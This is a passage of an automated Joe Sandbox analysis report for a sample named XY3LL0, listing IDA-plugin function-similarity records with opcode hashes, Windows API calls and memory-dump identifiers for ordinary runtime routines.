                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID:
                                                                                            • API String ID: 3702945584-0
                                                                                            • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                                            • Instruction ID: c8e9a672bada597bae3e3aec25ccf58c169c048817d696b3438a7fe05bebef7f
                                                                                            • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                                            • Instruction Fuzzy Hash: 7D11B122F0C2460DFB5867256D919792141DFA43F0F456335EB3F0B6D6FE2CE4418282
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID:
                                                                                            • API String ID: 3702945584-0
                                                                                            • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                                            • Instruction ID: 727a99563927bf039ce7c3c34d33622fd68ca01edbd8d1615f3d00a077434c09
                                                                                            • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                                            • Instruction Fuzzy Hash: 02111C52E1D2070DFB6967215C5197A1181CFA43F0F591735DB3F0A2E2FD2CB44182C2
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallEncodePointerTranslator
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 3544855599-2084237596
                                                                                            • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                                            • Instruction ID: 3478a0c9fb8eee00ee1b10c3784700ca90017716ddfbca41dc4f9f44f68736e2
                                                                                            • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                                            • Instruction Fuzzy Hash: B491C073E087858EEB11CB64E8406AC7BA0FB147A8F10413AEB5E07B95EF38D195CB41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 2395640692-1018135373
                                                                                            • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                                            • Instruction ID: 132006e2a1afc4bfd580cc0b18ca9126a03d159da2f578009155b69a8f341fdc
                                                                                            • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                                            • Instruction Fuzzy Hash: CB517B22F19A428FDB14AF15E844A7873D1EB64BE8F108131DB6F47789EA7DE8418781
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 3896166516-3733052814
                                                                                            • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                                            • Instruction ID: b445ab23580da8f3c1e0f302cd2a490c5d6441b02e980d8e466aa311429d43e5
                                                                                            • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                                            • Instruction Fuzzy Hash: 06515DB3D082828EEB658F119884B6876A0EB64BE4F144135DB6E47BD5EF3CE451C782
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallEncodePointerTranslator
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 3544855599-2084237596
                                                                                            • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                                            • Instruction ID: 1e49a23ec669556ce1a86c24f9678242d05243970217ad2a8a140a36fd749717
                                                                                            • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                                            • Instruction Fuzzy Hash: BF61C333D08BC589D7619B15E840BAAB7A0FB947E4F044225EBAE03B95EF7CD184CB41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleLoadModuleProc
                                                                                            • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                            • API String ID: 3055805555-3733552308
                                                                                            • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                            • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                                                            • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                            • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentSizeWorking
                                                                                            • String ID: Shrinking process size
                                                                                            • API String ID: 2122760700-652428428
                                                                                            • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                            • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                                                            • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                            • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Enter$Leave
                                                                                            • String ID:
                                                                                            • API String ID: 2801635615-0
                                                                                            • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                            • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                                                            • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                            • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                            • String ID:
                                                                                            • API String ID: 2718003287-0
                                                                                            • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                            • Instruction ID: 6079f70c6f40a3227641b72e822f47491484e4d5aef02d343ab4a1ea94025ccd
                                                                                            • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                            • Instruction Fuzzy Hash: 24D1A223F196818DE711CB65D8805AC37A1F7647E8B048225DF6F97BD9EE39D406C381
                                                                                            APIs
                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8FDF9ED07), ref: 00007FF8FDF9EE38
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8FDF9ED07), ref: 00007FF8FDF9EEC3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleErrorLastMode
                                                                                            • String ID:
                                                                                            • API String ID: 953036326-0
                                                                                            • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                            • Instruction ID: 8671d2577c35de10b346d0e99c25dcbc2e68179c16ecb2cb7aa778319ea9aa6b
                                                                                            • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                            • Instruction Fuzzy Hash: 9D91C223F196528DF7509B259880ABC2BA4FB24BE8F14413ADF1F566D4EF39D441C782
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                                                            • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                                                            • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalEventSection$EnterLeaveReset
                                                                                            • String ID:
                                                                                            • API String ID: 3553466030-0
                                                                                            • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                            • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                                                            • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                            • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalEventSection$EnterLeaveReset
                                                                                            • String ID:
                                                                                            • API String ID: 3553466030-0
                                                                                            • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                            • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                                                            • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                            • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                            • Instruction ID: 200cd99a356e0af3d8c185c4eaaafff5b832106bda518c264e89a12f38e3cf16
                                                                                            • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                            • Instruction Fuzzy Hash: 40111F22B14B1189EB008B60EC557A933A4FB697A8F441931DB6E87BA8EF78D155C380
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateEvent$CriticalInitializeSection
                                                                                            • String ID:
                                                                                            • API String ID: 926662266-0
                                                                                            • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                            • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                                                            • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                            • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: __except_validate_context_record
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 1467352782-3733052814
                                                                                            • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                            • Instruction ID: 12b06b555a115ee955d527ad014ce0b009bddffd4a909be6ac03ddf55aaee813
                                                                                            • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                            • Instruction Fuzzy Hash: B7719033D096818AD7629B259840B7D7BA0EB14BE8F048135EF5E47BC9EB3DD451C782
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFrameInfo__except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 2558813199-1018135373
                                                                                            • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                            • Instruction ID: 6c7045df8e3f05ea7ff39f7f8cb7dffd8c12e5f17bfc152eff73f882db3b0f6c
                                                                                            • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                            • Instruction Fuzzy Hash: EB515D33A187458BD720AF15A84066D77E4FB99BE0F100135EB9E07B95DF38E951CB82
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID: U
                                                                                            • API String ID: 442123175-4171548499
                                                                                            • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                            • Instruction ID: efe7a9960cc97d0ef0b43d17304d503a429f5b9c9b6eb8ae8d6868e4cbee17c5
                                                                                            • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                            • Instruction Fuzzy Hash: 0D41B363B19A4185DB208F25E8447AA67A1FBA87E4F444031EF4F87798EF3DD441CB81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise
                                                                                            • String ID: csm
                                                                                            • API String ID: 3997070919-1018135373
                                                                                            • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                            • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                                                            • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                            • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                                                            APIs
                                                                                              • Part of subcall function 00007FF8FDF93A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8FDF93A63
                                                                                            • __GSHandlerCheckCommon.LIBCMT ref: 00007FF8FDFA0993
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CheckCommonHandler__except_validate_context_record
                                                                                            • String ID: csm$f
                                                                                            • API String ID: 1543384424-629598281
                                                                                            • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
